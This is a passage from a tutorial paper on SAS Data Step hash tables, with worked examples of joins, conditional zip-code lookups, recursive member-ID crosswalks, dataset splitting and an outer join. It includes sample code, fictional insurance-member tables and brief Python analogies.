<tr> <td>3</td> <td>JKL</td> <td>HMO Executive</td> <td>344-123</td> </tr>
<tr> <td>4</td> <td>XYZ</td> <td>HMO Salaried</td> <td>395-123</td> </tr>
<tr> <td>5</td> <td>ABC</td> <td>PPO Hourly</td> <td>495-987</td> </tr>
<tr> <td>6</td> <td>ABC</td> <td>PPO Hourly</td> <td>562-987</td> </tr>
<tr> <td>7</td> <td>XYZ</td> <td>HMO Salaried</td> <td>697-123</td> </tr>
<tr> <td>8</td> <td>JKL</td> <td>HMO Executive</td> <td>833-144</td> </tr>
<tr> <td>9</td> <td>ABC</td> <td>PPO Hourly</td> <td>987-123</td> </tr>
</tbody>
</table>

**EXAMPLE 2A: JOIN 3 DATASETS (WITHOUT SORTING, ONE STEP)**

The second example is an enhancement of the first. It involves adding a second field to the Members dataset based on a different key. In the first example we needed to pick up Plan_desc based on the value of Plan_id. Hash tables allowed us to avoid sorting the large Members dataset. Since we don't have to sort to accomplish a join, why not do more than one at a time? Let's add a lookup on Group_id to Group_name.
Members:
<table>
<thead> <tr> <th>Member_id</th> <th>Plan_id</th> <th>Group_id</th> </tr> </thead>
<tbody>
<tr> <td>164-234</td> <td>XYZ</td> <td>G123</td> </tr>
<tr> <td>297-123</td> <td>ABC</td> <td>G123</td> </tr>
<tr> <td>344-123</td> <td>JKL</td> <td>G456</td> </tr>
<tr> <td>395-123</td> <td>XYZ</td> <td>G123</td> </tr>
<tr> <td>495-987</td> <td>ABC</td> <td>G456</td> </tr>
<tr> <td>562-987</td> <td>ABC</td> <td>G123</td> </tr>
<tr> <td>697-123</td> <td>XYZ</td> <td>G456</td> </tr>
</tbody>
</table>

Groups:
<table>
<thead> <tr> <th>Group_id</th> <th>Group_name</th> </tr> </thead>
<tbody>
<tr> <td>G123</td> <td>Umbrellas, Inc.</td> </tr>
<tr> <td>G456</td> <td>Toy Company</td> </tr>
</tbody>
</table>

Now our Members table starts with 3 variables, and we need to add 2 more (Plan_desc, as in Example 1, and Group_name).

**APPROACH**

We will modify the code shown for Example 1 to create a second hash table in the same Data step, and look up 2 values for each record in the Members dataset. In the code below, the old code is shown in plain font; the additions to accomplish the second join are marked with comments.

```plaintext
data all (drop=rc);
  declare hash Plan ();                 /* same as Example 1 */
  rc = plan.DefineKey ('Plan_id');
  rc = plan.DefineData ('Plan_desc');
  rc = plan.DefineDone ();

  declare hash Group ();                /* similar code, 2nd table */
  rc = group.DefineKey ('Group_id');
  rc = group.DefineData ('Group_name');
  rc = group.DefineDone ();

  do until (eof1);                      /* same as Example 1 */
    set plans end = eof1;
    rc = plan.add ();
  end;

  do until (eof2);                      /* similar code, 2nd table */
    set groups end = eof2;
    rc = group.add ();
  end;

  do until (eof3);
    set members end = eof3;
    call missing(Plan_desc);            /* initialize both lookups */
    rc = plan.find ();                  /* same as Example 1 */
    call missing(Group_name);           /* initialize both lookups */
    rc = group.find ();                 /* similar code, 2nd table */
    output;
  end;
  stop;
run;
```

The resulting dataset looks like this:

<table>
<thead> <tr> <th>Obs</th> <th>Member_id</th> <th>Plan_id</th> <th>Plan_desc</th> <th>Group_id</th> <th>Group_name</th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>164-234</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr>
<tr> <td>2</td> <td>297-123</td> <td>ABC</td> <td>PPO Hourly</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr>
<tr> <td>3</td> <td>344-123</td> <td>JKL</td> <td>HMO Executive</td> <td>G456</td> <td>Toy Company</td> </tr>
<tr> <td>4</td> <td>395-123</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr>
<tr> <td>5</td> <td>495-987</td> <td>ABC</td> <td>PPO Hourly</td> <td>G456</td> <td>Toy Company</td> </tr>
<tr> <td>6</td> <td>562-987</td> <td>ABC</td> <td>PPO Hourly</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr>
<tr> <td>7</td> <td>697-123</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G456</td> <td>Toy Company</td> </tr>
</tbody>
</table>

**EXAMPLE 2B: JOIN ON 2 LEVELS OF SPECIFICITY**

Conditional joins are a special case of the 3 dataset example. In a conditional join you want to merge a record from one dataset with a record from one of two other datasets depending on a condition. The example we will use here is joining demographic summary data to an individual record based on zip code, where the zip code might be 5 digits or 9 digits long. U.S. zip codes at the 9-digit level are small subsets of the 5-digit zip code. In some towns or cities, 9-digit zip codes contain enough people to provide summary statistics. In others, a single person might have his/her own 9-digit zip code. In the latter case, summary statistics would be available only at the 5-digit level. Given a dataset of members, we want to join the summary statistics at the finest level of detail available (try to join on 9-digit but if that is not available join on the 5-digit).
Members:
<table>
<thead> <tr> <th>Obs</th> <th>zip</th> <th>Member_id</th> </tr> </thead>
<tbody>
<tr> <td>1</td> <td>04021</td> <td>164-234</td> </tr>
<tr> <td>2</td> <td>22003-1234</td> <td>297-123</td> </tr>
<tr> <td>3</td> <td>45459-0306</td> <td>344-123</td> </tr>
<tr> <td>4</td> <td>03755</td> <td>395-123</td> </tr>
<tr> <td>5</td> <td>94305</td> <td>495-987</td> </tr>
<tr> <td>6</td> <td>78277-8310</td> <td>562-987</td> </tr>
<tr> <td>7</td> <td>88044-3760</td> <td>697-123</td> </tr>
</tbody>
</table>

In the illustration above, some members have a 5-digit zip code and some have a full 9-digit zip code. The reasons for the failure to match at the 9-digit level do not affect our strategy. If a match exists on the 9-digit table, we want the value of the income field from the 9-digit table to go on the Members record. If a match does not exist on the 9-digit table, for any reason, we want to fall back on the income field from the 5-digit table.

**APPROACH**

As in Example 2A, we will use one Data step and load 2 hash tables (one for the Zip5 level data and one for the Zip9 level data). For each record in the Members dataset we will first try to join to the Zip9 hash table. If this fails, we will join to the Zip5 hash table. This example enables us to introduce more error handling techniques. The ability to detect whether the lookup has been successful is useful in many scenarios.
Here we use it to determine whether we need to attempt the lookup to a second table or not. The variable you name in the assignment statement that executes the method (for example, rc = zip5.find();) will contain a zero after a successful execution of the method, or a non-zero value if the execution was not successful. In this case, if a row in the hash table Zip5 exists for the current value of the key variable Zip, rc = 0. If no row matching Zip exists, the value of rc will be non-zero immediately after the statement is executed.

```plaintext
data member_income (drop=rc);
  length zip $ 9;

  declare hash Zip5 (dataset: 'Zip');          /* uses different way to load data */
  rc = zip5.DefineKey ('Zip');
  rc = zip5.DefineData ('Income');
  rc = zip5.DefineDone ();

  declare hash Zip9 (dataset: 'Zip_plus_4');   /* uses different way to load data */
  rc = zip9.DefineKey ('Zip');
  rc = zip9.DefineData ('Income');
  rc = zip9.DefineDone ();

  do until (eof3);
    set members end = eof3;
    income = .;     /* initialize income in case zip is not found at all */
    rc = zip9.find ();
    if rc ne 0 then rc = zip5.find ();
    output;
  end;
  stop;
run;
```

This code illustrates some new aspects of hash table processing. Instead of loading data into the hash table through a DO loop and SET statement, we take advantage of a feature of the DECLARE statement that allows us to name a dataset for loading the hash table. This is convenient when no modifications or exceptions are needed and the hash table needs to be loaded only once. The data are loaded when the DefineDone method is called. Only the fields identified in the DefineKey or DefineData method are excerpted from the named dataset.

In the DO UNTIL (eof3) loop, we read each record from the Members dataset. We initialize income to missing before attempting to look up the income for that member's zip code. This is necessary because the income variable will continue to hold the value from the last successful lookup.
If neither lookup is successful for a given member, we run the risk of holding the income from the last member. The conditional lookup occurs next. First we attempt a match to the zip9 hash table (rc = zip9.find();). Next we test the rc variable to see if that lookup was successful (if rc ne 0 then). Only if that lookup was not successful do we attempt a lookup to the zip5 hash table (rc = zip5.find();). The resulting dataset looks like this: <table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>zip</th> <th>income</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>04021</td> <td>$45,000</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>22003-1234</td> <td>$56,999</td> </tr> <tr> <td>3</td> <td>344-123</td> <td>45459-0306</td> <td>$72,999</td> </tr> <tr> <td>4</td> <td>395-123</td> <td>03755</td> <td>$75,000</td> </tr> <tr> <td>5</td> <td>495-987</td> <td>94305</td> <td>$96,000</td> </tr> <tr> <td>6</td> <td>562-987</td> <td>78277-8310</td> <td>$32,999</td> </tr> <tr> <td>7</td> <td>697-123</td> <td>88044-3760</td> <td>$47,999</td> </tr> </tbody> </table> You can see that the Member records with 9-digit zip codes contain incomes from the 9-digit table (conveniently created ending in 999) and Member records with 5-digit zip codes contain incomes from the 5-digit table. This is the desired result—chalking up another one for hash tables! **ERROR HANDLING** Two techniques to avoid data errors in the case of mismatched data have been shown. It is essential to use one or more of them every time you employ hash tables. The choice depends on what you want your resulting dataset to contain. In example 1 above, we wanted to keep all the records from the main dataset, whether or not they were found on the hash table, so we took the precaution of initializing the looked up variable values to missing prior to each lookup. If the lookup failed, the variables remain missing. 
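The initialize-then-fall-back pattern driven by the find() return code is language-neutral. Below is a conceptual Python analogy (a sketch, not SAS): the dicts stand in for the Zip9 and Zip5 hash tables, and the sample values simply echo the paper's data.

```python
# Conceptual analogy: two lookup tables, 9-digit preferred, 5-digit fallback.
zip9 = {"22003-1234": 56999, "45459-0306": 72999}
zip5 = {"04021": 45000, "03755": 75000}

def lookup_income(zip_code):
    # Initialize to "missing" first, so a failed lookup cannot
    # carry over a value from the previous record.
    income = None
    if zip_code in zip9:        # rc = zip9.find();
        income = zip9[zip_code]
    elif zip_code in zip5:      # if rc ne 0 then rc = zip5.find();
        income = zip5[zip_code]
    return income
```

As in the Data step, initializing income before each lookup guarantees that a member whose zip matches neither table ends up with a missing income rather than a stale one.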
If you want an inner join, that is, you want the output dataset to contain only those records that are found on the hash table, you can control the output with the return code variable:

if rc = 0 then output;

In this situation, it is not as essential that you initialize the variable(s) you are looking up, because in the event of a lookup failure, you are deleting the record. Now, on to more examples. **EXAMPLE 3: DÉJÀ VU** We now leave the world of joins to show a different application of hash tables. In this case, we need to keep track of what we have encountered in this pass of a dataset and compare subsequent records to every value of a particular variable we have seen before. We will take advantage of one of the huge assets of hash tables: no need to dimension them in advance (we don’t need to know how many values we might eventually load). Specifically, let’s conjure up a dataset of health care claims. For simplicity, let’s consider just the Member_id, the service date, and the diagnosis associated with the claim (dx). We will sort them in chronological order, and as we process each one, we want to know if it is the first claim for a given member (or, conversely, if we have seen that member before in this dataset of claims). As a bonus, let's also keep track of the latest (most recent) claim date for each member. And finally, let's output that information (a list of the unique members we have seen and the latest claim date for each) when we reach the end of the claims. This is in addition to the claims level data, which we will also output to a new dataset. **APPROACH** Unlike the previous examples, we do not have any data to load into the hash table when the Data step starts. Instead, we will create the structure only. As we process each claim, we will check the hash table to see whether the member is in there. In the beginning, no members will be in there. 
When we don't find a member, we will insert a record in the hash table with that member_id. We will also insert the date of the claim. As we process claims, we will eventually get to one for a member we have seen before. At that point, we do not want to insert a new record in the hash table, but we do want to update the field for the latest claim date. Since the claims are in chronological order, each new claim we encounter will have a date at least the same but more likely later than the date already entered for that member. When we get to the end of the claims dataset, we will output the hash table to a SAS dataset to preserve the information for later processing. ```sas
data Processed_Claims(drop=rc);
  dcl hash members (ordered: 'a');
  rc = members.DefineKey ('Member_id');
  rc = members.DefineData ('Member_id','Latest_dt');
  rc = members.DefineDone ();
  do until (eof);
    set claims end = eof;
    latest_dt = .;
    rc = members.find ();
    if rc eq 0 then do;
      * insert code to run if we have seen this member before *;
      seen_it = 'YES';
    end;
    else do;
      * insert code if we have not seen this member before *;
      seen_it = 'NO';
    end;
    latest_dt = svc_dt;
    members.REPLACE();
    output;                                   * output processed claim *;
  end;
  members.OUTPUT(dataset: 'Member_latest');   * output member summary *;
  stop;
run;
``` In this code we see another feature of the DECLARE statement: the ability to specify that the data in the hash table be ordered in ascending sequence (by the key—you may not sort a hash table by anything other than the key). This is useful when the hash table will be output as a dataset. We also see a new wrinkle in the Define section: the key variable (Member_id) is listed both as the key and as an element of Data. This prepares for creating a dataset from the hash table data. The hash table key is used behind the scenes and does not exist as a data element in the hash table unless specified in the DefineData method. No data are loaded to the hash table initially. 
The Claims dataset is processed inside a DO loop (meaning that the Data step will execute in its entirety only once). After each record is read, we initialize the variable latest_dt to avoid holding it over from the last record. Then we try to find the Member_id in the hash table. If the rc eq 0 (meaning the member_id is already in the hash table), we can execute whatever other code would be appropriate for members we have seen before. We set a variable called seen_it to the value ‘YES’ just to show how the processing works. If we do not find the member_id in the hash table (if rc ne 0), we can execute the code appropriate to that circumstance. We set the variable seen_it to ‘NO’. Now, whether we have seen the member before or not, we set the latest_dt to the service date of the current claim and execute the REPLACE method. This will do one of two things: if the member_id already exists on the hash table, it will overwrite the record with the new latest_dt. If the member_id does not already exist on the hash table, it will add a record (with the current member_id and latest_dt) to the hash table. After the DO UNTIL loop completes, we know we have processed all the records in the claims dataset. At that point, we execute the OUTPUT method on the hash table Members to create a SAS dataset called Member_latest. 
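To make the find/replace cycle concrete, here is a small Python analogy of the seen-before bookkeeping (again a sketch, not SAS): a dict plays the role of the members hash table, and the sample claims are illustrative.

```python
# Conceptual analogy of Example 3: track whether each member has been
# seen before and the latest claim date, using a dict as the hash table.
claims = [("164-234", "2005/01/01"), ("297-123", "2005/02/03"),
          ("164-234", "2005/03/15")]

latest = {}       # member_id -> latest service date (the hash table)
processed = []    # the Processed_Claims output

for member_id, svc_dt in claims:
    # members.find(): rc eq 0 exactly when the member is already present.
    seen_it = "YES" if member_id in latest else "NO"
    # members.REPLACE(): add the member or overwrite the stored date.
    latest[member_id] = svc_dt
    processed.append((member_id, svc_dt, seen_it))
```

At the end, `latest` holds one entry per unique member with the most recent date, mirroring the Member_latest dataset written by the OUTPUT method.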
The resulting datasets look like this: <table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>svc_dt</th> <th>dx</th> <th>seen_it</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>2005/01/01</td> <td>250</td> <td>NO</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>2005/02/03</td> <td>4952</td> <td>NO</td> </tr> <tr> <td>3</td> <td>164-234</td> <td>2005/03/15</td> <td>78910</td> <td>YES</td> </tr> <tr> <td>4</td> <td>297-123</td> <td>2005/04/14</td> <td>250</td> <td>YES</td> </tr> <tr> <td>5</td> <td>297-123</td> <td>2005/08/19</td> <td>12345</td> <td>YES</td> </tr> <tr> <td>6</td> <td>164-234</td> <td>2005/09/13</td> <td>250</td> <td>YES</td> </tr> <tr> <td>7</td> <td>297-123</td> <td>2005/11/01</td> <td>4952</td> <td>YES</td> </tr> </tbody> </table> The variable seen_it allows us to note that the code executed correctly in determining whether each claim was that member’s first claim in the dataset. The rows in the Member_latest dataset show that we correctly identified all the unique members and the latest claim date for each. **EXAMPLE 4: CHAIN (UNLIMITED RECURSIVE LOOKUPS)** Hash tables are the ideal solution to this problem. Suppose you have a membership table, such as an insurance company might maintain on its members. At various points in a member’s history the unique ID might have changed. For example, in the health insurance industry when federal legislation required that the SSN become a private rather than a public ID, health insurance companies were required to assign new ID numbers to the entire membership. When IDs change, you are faced with the problem of historical data: claims or other transactions that occurred prior to the change have the old ID while later transactions have the new ID. Furthermore, other events can cause member ID changes, so that a given member might have 3, 4, or more IDs over her entire history. How do you process a series of transactions with IDs of an unknown generation on them? 
As long as you have a database of changes, hash tables provide an easy answer. Consider the Old_new_xwalk dataset, which records each ID change as an old_id/new_id pair. It shows a chain of ID changes for 164-234: it was changed to N164-234 (Obs 1), then N164-234 was changed to M164-234 (Obs 4), then M164-234 was changed to P164-234 (Obs 6), and finally P164-234 was changed to A164-234 (Obs 7). Although most real cases don’t involve this many steps, the primary problem is that you don’t know how many steps a given ID might have and it is hard to write code to check “until done”. **APPROACH** The code below shows how to use a hash table to solve this problem. The first step is to load the Old_new_xwalk into a hash table. Then we process the records from the Members table, one at a time. For each record with a member_id, we check the hash table for rows where that member_id occurs in the “old_id” position. If we find a row, we have the new_id that it was changed to in the variable called New_id. To find out whether that ID was ever changed, we move that value to the Old_id position and again check the hash table for a row. If we find another row, it means that the new_id from the first row became the old_id in a new pair later on. We continue this process (putting the New_id in the Old_id position and checking the hash table) until we no longer find a row. When this happens, we know that the value currently stored in the Old_id position does not occur on the crosswalk table with any new_id assigned to it, so we conclude that we now have the latest ID for that person. ```sas
data members_update(drop=rc);
  if 0 then set old_new_xwalk;    /* sets up the variable types */
  dcl hash xwalk (dataset: 'old_new_xwalk');
  xwalk.definekey ('old_id');
  xwalk.definedata ('new_id');
  xwalk.definedone ();
  do until (eof);
    set members end=eof;
    new_id = ' ';
    old_id = member_id;
    /* provides a counter called lookups and stops infinite looping.
       See text below. */
    do lookups = 1 by 1 until (rc ne 0 or lookups > 1000);
      rc = xwalk.FIND();
      old_id = new_id;
    end;
    output;
  end;
  stop;
run;
``` The integrity of the crosswalk is key to making this (or any) solution work. For example, if a given old_id occurs twice on the crosswalk assigned to two different new_ids, you have a “split” and it requires business input to decide how you want to treat those. The code shown in this example will not accept two rows into the hash table with the same key (old_id), so splits will not be present at processing time. If your crosswalk contains “merges” [cases where two different old_ids are assigned to the same new_id], this solution will process them correctly and assign all claims under both old_ids to the same new_id. The one problem we have to code around is the potential infinite loop that will occur if there are 2 records that assign A to B and then B to A. This is a business and data problem, but it will become a processing problem if allowed to sneak through. The code that checks for lookups > 1000 is one way to stop infinite looping caused by this data issue. It would be preferable to clean up your crosswalk before entering this process. 
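The chain-following loop, including the guard against infinite looping, can be sketched in Python (a conceptual analogy, not SAS): the dict stands in for the xwalk hash table. Unlike the Data step version, this sketch simply returns an unchanged ID as-is rather than leaving the fields blank.

```python
def latest_id(member_id, xwalk, max_lookups=1000):
    # Follow old_id -> new_id links until no further row is found,
    # counting lookups and capping them to stop A->B->A infinite loops.
    old_id = member_id
    for lookups in range(1, max_lookups + 1):
        if old_id not in xwalk:     # rc ne 0: this ID was never changed again
            break
        old_id = xwalk[old_id]      # move the new_id into the old_id slot
    return old_id, lookups

# The chain for 164-234 described in the text:
xwalk = {"164-234": "N164-234", "N164-234": "M164-234",
         "M164-234": "P164-234", "P164-234": "A164-234"}
```

Following the whole chain for 164-234 takes five lookups (four hits plus the final miss), matching the Lookups column in the result table, while an ID that never changed is resolved in a single failed lookup.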
The resulting dataset is shown below: <table> <thead> <tr> <th>Obs</th> <th>old_id</th> <th>new_id</th> <th>member_id</th> <th>plan_id</th> <th>group_id</th> <th>lookups</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>A164-234</td> <td>A164-234</td> <td>164-234</td> <td>XYZ</td> <td>G123</td> <td>5</td> </tr> <tr> <td>2</td> <td>B297-123</td> <td>B297-123</td> <td>297-123</td> <td>ABC</td> <td>G123</td> <td>3</td> </tr> <tr> <td>3</td> <td>C344-123</td> <td>C344-123</td> <td>344-123</td> <td>JKL</td> <td>G456</td> <td>2</td> </tr> <tr> <td>4</td> <td></td> <td></td> <td>395-123</td> <td>XYZ</td> <td>G123</td> <td>1</td> </tr> <tr> <td>5</td> <td></td> <td></td> <td>495-987</td> <td>ABC</td> <td>G456</td> <td>1</td> </tr> <tr> <td>6</td> <td></td> <td></td> <td>562-987</td> <td>ABC</td> <td>G123</td> <td>1</td> </tr> <tr> <td>7</td> <td></td> <td></td> <td>697-123</td> <td>XYZ</td> <td>G456</td> <td>1</td> </tr> </tbody> </table> The latest ID for each member is shown in both the Old_id and New_id field because the last step before stopping the lookup is to assign the latest value of the New_id variable to the Old_id field for another lookup. If no value occurs in either field it is because the member_id does not exist on the crosswalk in the Old_id field (meaning that ID was never changed). The counter in the Lookups field shows how many times we iterated through change before finding a value of New_id that had not been changed. Every member_id is looked up at least once, but if it does not exist in the crosswalk at all, no value appears in the New_id field. **EXAMPLE 5: OUTPUT N DATASETS** In this example, the goal is to split a dataset into N pieces, where N is determined by the number of distinct values in a particular field. In the past this might have been accomplished using macro code: preprocess the data to determine the number of datasets needed, then use macros to write a data statement with N datanames. With hash tables, no preprocessing is necessary. 
And as a bonus, you can give names to the datasets reflecting the value of the distinguishing variable represented in each dataset. Perhaps a concrete example will help clarify. Once again, consider our Members dataset. <table> <thead> <tr> <th>Obs</th> <th>member_id</th> <th>plan_id</th> <th>group_id</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>XYZ</td> <td>G123</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>ABC</td> <td>G123</td> </tr> <tr> <td>3</td> <td>344-123</td> <td>JKL</td> <td>G456</td> </tr> <tr> <td>4</td> <td>395-123</td> <td>XYZ</td> <td>G123</td> </tr> <tr> <td>5</td> <td>495-987</td> <td>ABC</td> <td>G456</td> </tr> <tr> <td>6</td> <td>562-987</td> <td>ABC</td> <td>G123</td> </tr> <tr> <td>7</td> <td>697-123</td> <td>XYZ</td> <td>G456</td> </tr> </tbody> </table> You can see that members belong to one of two different groups (G123 or G456). If we know this in advance, we can write code such as: ```sas
data group_G123 group_G456;
  set members;
  if group_id = 'G123' then output group_G123;
  else if group_id = 'G456' then output group_G456;
run;
``` But what if you don’t know how many groups there are? We are using simple data for brevity of illustration; the code is the same for the larger situation. **APPROACH** To use hash tables in the way shown below, the Members dataset must be sorted by Group_id. You might consider this a small price to pay for the convenience of the solution. Once the data are sorted, we can process each group using the first.var and last.var automatic variables provided in the Data step for variables named in the By statement. 
Here is the code, followed by an explanation: ```sas proc sort data=members; by group_id; run; data _null_; if 0 then set members; /* create variable types */ dcl hash groups (ordered: 'a'); groups.definekey ('member_id','plan_id','_n_'); groups.definedata ('member_id','plan_id' ); groups.definedone (); do _n_ = 1 by 1 until (last.group_id); set members; by group_id; groups.add(); end; groups.output (dataset: compress('GROUP_'||group_id)); run; ``` After the sort, we start a Data step and create a hash table structure. Unlike our previous examples in which each hash table was filled only once, this example shows that you can empty and fill a hash table multiple times during the execution of the Data step. We will read successive records from Members and fill a hash table with all the records for a particular Group_ID. When we encounter the last record for that Group_id, we will output the contents of the hash table to a SAS dataset named using the value in the Group_id field at the time. We then allow the Data step to loop as it normally does, emptying and re-creating the hash table structure before starting to read the records associated with the next value of Group_id. Once again, this example shows that we have to put all the variables that we want to see in the output dataset in the DefineData method because the key variables are used only to construct the index. They do not exist on the hash table as data fields. In this example, the key actually contains more fields than the data. The reason for this is to allow multiple rows with the same member_id and plan_id. Remember that hash tables cannot have more than one row with the same key value. Unique keys are essential to the construction that delivers the amazing efficiency. Adding the _n_ variable to the key enforces uniqueness of key while allowing multiple rows with the same member_id and plan_id in the incoming (and outgoing) dataset. 
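The split-by-group logic maps naturally onto any keyed container. Here is a conceptual Python analogy (a sketch, not SAS; the names are illustrative) which, like the Data step version, requires the input to be sorted by the grouping field first:

```python
from itertools import groupby

# Conceptual analogy of Example 5: one output "dataset" per distinct
# group value, named after that value.
members = [("164-234", "XYZ", "G123"), ("344-123", "JKL", "G456"),
           ("395-123", "XYZ", "G123")]

# As in the SAS version, the input must be sorted by group_id first;
# itertools.groupby only groups adjacent rows with equal keys.
members.sort(key=lambda row: row[2])

datasets = {}
for group_id, rows in groupby(members, key=lambda row: row[2]):
    # groups.output (dataset: 'GROUP_' || group_id)
    datasets["GROUP_" + group_id] = [(m, p) for m, p, g in rows]
```

Each pass over one group mirrors filling the hash table between first.group_id and last.group_id and then emptying it with the OUTPUT method.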
This would be a good time to discuss the heavy use of quoting in specifying parameters to the methods. The benefits of this are shown in the groups.output statement. All the methods are set up to accept variables as well as hard-coded values as parameters, allowing for data-driven code. In the case of the groups.output we can specify that the name of the dataset to be created is GROUP_ plus whatever value is in the group_id field at the time the statement is executed. This flexibility of allowing variables to be parameters requires that you quote anything you are hardcoding, to distinguish those from variable names (the same reason you have to code A="YES" instead of A=YES to distinguish the value YES from the variable name YES). The resulting datasets, GROUP_G123 and GROUP_G456, each contain the Member_id and Plan_id for the members of that group. You can see in the code that we specified only Member_id and Plan_id as fields on the hash tables; therefore, those are the only fields that show up in the output datasets. We could have kept Group_id to show that only records with Group_id = "G123" show up in the dataset GROUP_G123. All we would have to do is add Group_id to the DefineData method statement. **EXAMPLE 6: OUTER JOIN** The last example is included not so much because hash tables are always the right tool to use in this situation, but to respond to questions about whether a hash table can be used when an outer join is needed. Recall that an outer join of 2 datasets contains the union of all records in the datasets. It matches the records where the key value exists in both datasets, and it also includes records from each dataset where the key values do not appear in the other dataset. This example also introduces the only other object currently available in the Data Step Component Object Interface: the hash iterator object, or hiter. Consider the following datasets. One contains a list of members along with their Plan_id. The other contains members and their Group_ids. 
**Mbr_plan**

<table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>Plan_id</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-111</td> <td>XYZ</td> </tr> <tr> <td>2</td> <td>297-111</td> <td>ABC</td> </tr> <tr> <td>3</td> <td>344-111</td> <td>JKL</td> </tr> <tr> <td>4</td> <td>395-111</td> <td>XYZ</td> </tr> <tr> <td>5</td> <td>495-111</td> <td>ABC</td> </tr> <tr> <td>6</td> <td>562-111</td> <td>ABC</td> </tr> <tr> <td>7</td> <td>697-111</td> <td>XYZ</td> </tr> </tbody> </table> The Mbr_group dataset similarly pairs each Member_id with a Group_id; it includes member 833-888 (group G456), who does not appear in Mbr_plan. We want to build one dataset with all the members that exist in either table, along with their Plan_ids and Group_ids. Can we do an outer join on Member_id using hash tables? But of course! **APPROACH** We will start by loading one dataset (Mbr_group) into a hash table, adding a column for flagging whether that row in the hash table matches a row from the Mbr_plan dataset. We then process the Mbr_plan dataset one row at a time, looking it up in the hash table and flagging the rows we find. When we are completely finished with Mbr_plan, we use the hash iterator object to process the rows in the hash table (Mbr_group), and write to the output dataset the rows that were not flagged as previously found. Here is the code: ```sas
data all;   * (drop=_:);   /* use this form of drop= if desired */
  if 0 then set mbr_group;    /* set up variables */
  dcl hash hh (ordered: 'a');
  dcl hiter hi ('hh');        /* hash iterator object */
  hh.definekey ('member_id');
  hh.definedata ('member_id','group_id','_f');
  hh.definedone ();
  do until (eof2);
    set mbr_group end = eof2;
    _f = .;                   /* initialize flag _f in hash table */
    hh.add();
  end;
  * Output all rows in mbr_plan *;
  do until (eof);
    set mbr_plan end = eof;
    call missing (group_id);  /* initialize group_id for each new record in Mbr_plan */
    if hh.find() = 0 then do;
      _f = 1;
      hh.replace();   /* overwrite record in hash table with new value of _f */
      output;
      _f = .;         /* initialize _f back to missing to prepare for next */
    end;
    else output;
  end;
  /* at this point all Mbr_plan records have been read */
  * Output remaining rows *;
  do _rc = hi.first() by 0 while (_rc = 0);
    if _f ne 1 then do;
      call missing (plan_id); /* rows in the hash table will not have values for plan_id */
      output;
    end;
    _rc = hi.next();
  end;
  stop;
run;
``` We set up a Data step to write a dataset called ALL. The drop= option is commented out but can be used as a convenience to drop all variables that start with an underscore. This will drop the variable _f from the dataset ALL. If you get in the habit of naming all your temporary variables with an initial _, you can use this form of the drop all the time. The statement "if 0 then set mbr_group;" establishes the variables in the dataset Mbr_group in the program data vector without actually reading any records. This is important so that when the hash table is declared, SAS knows what type and length each of the variables should be. A hash table named hh is created, with the specification that the rows be ordered in ascending sequence by the key value. Immediately afterward, a hash iterator object named hi is declared pointing to the hash table hh. The iterator object allows the use of methods like .first() and .next() seen in the last DO loop. Once the hash table is declared, we fill it with the records from Mbr_group (the “do until (eof2)” loop). Note that we are assuming there are no duplicates on Member_id in either table. The method hh.add() will reject any row with a key value equal to an existing row. The next DO loop (do until (eof)) processes the records from Mbr_plan, one at a time. For each record, group_id is initialized to avoid carrying forward the value from the last successful hh.find(). The statement “if hh.find() = 0 then do;” both executes the find() method and tests the result for success. If it is successful (if the member_id on the record we just read from Mbr_plan exists on the hash table), the value of group_id from the hash table will be brought into the Data step variable group_id. 
We set the flag _f to 1, signaling that we have found that record, and .replace() that row in the hash table. Since the current values of Member_id and Group_id in the Data step match what we just brought from the hash table, the only change the .replace() method accomplishes is to set the flag _f to 1 in the hash table. Once we do that and output the record to ALL, we reset the flag _f back to missing to prepare for reading the next record. If the rc from executing the .find() method on this record is not 0, meaning that member_id does not exist in the Mbr_group table, all we have to do is output the record to ALL (since we want records from either dataset, whether or not it matches a record in the other dataset). After the completion of the do until (eof) loop, we have finished reading all the records from Mbr_plan (and writing them to ALL). The last step is to take advantage of the methods available to the hash iterator object. These methods access the hash table that the iterator object is linked to (hh) and move a pointer through its rows, bringing the values from the hash table into the SAS program data vector. They are then ready for output to the SAS dataset. We can check each row of the hash table sequentially to see whether it was matched to a record from Mbr_plan. If not, we can output it to ALL. If it is flagged, we know it already exists in ALL and there is no need to output it. At the bottom of the data step, we know we have output all the records in Mbr_plan and all the records in Mbr_group to ALL, matching those with the same Member_id. Voilà, an outer join via hash tables!

**CONCLUSIONS**

In this paper you have seen a variety of applications for the new Data Step Component Object Interface tools called hash tables. This small set just scratches the surface of their potential utility. Hash tables deliver amazing efficiency for remarkably little investment in coding. 
They can be used in a variety of circumstances, and they solve at least one heretofore intractable problem. Limited only by available RAM and your imagination, these new Data Step Component Objects have revolutionized data processing. This paper provides you with the means and the motivation to use hash tables. Why not try them out today?

**DISCLAIMER**

All code contained in this paper is provided on an "AS IS" basis, without warranty. The author makes no representation, or warranty, either express or implied, with respect to the programs, their quality, accuracy, or fitness for a specific purpose. Therefore, the author shall have no liability to you or any other person or entity with respect to any liability, loss, or damage caused or alleged to have been caused directly or indirectly by the programs provided in this paper. This includes, but is not limited to, interruption of service, loss of data, loss of profits, or consequential damages from the use of these programs.

**ACKNOWLEDGMENTS**

SAS is a Registered Trademark of the SAS Institute, Inc. of Cary, North Carolina. This paper and the author owe an enormous debt to Paul Dorfman, who showed infinite kindness and patience to someone learning not just about hash tables but about various intricacies of the Data step. Thanks also to developers at SAS Institute for consultation on specific topics. Any errors in this paper are those of the author not of the information suppliers.

**CONTACT INFORMATION**

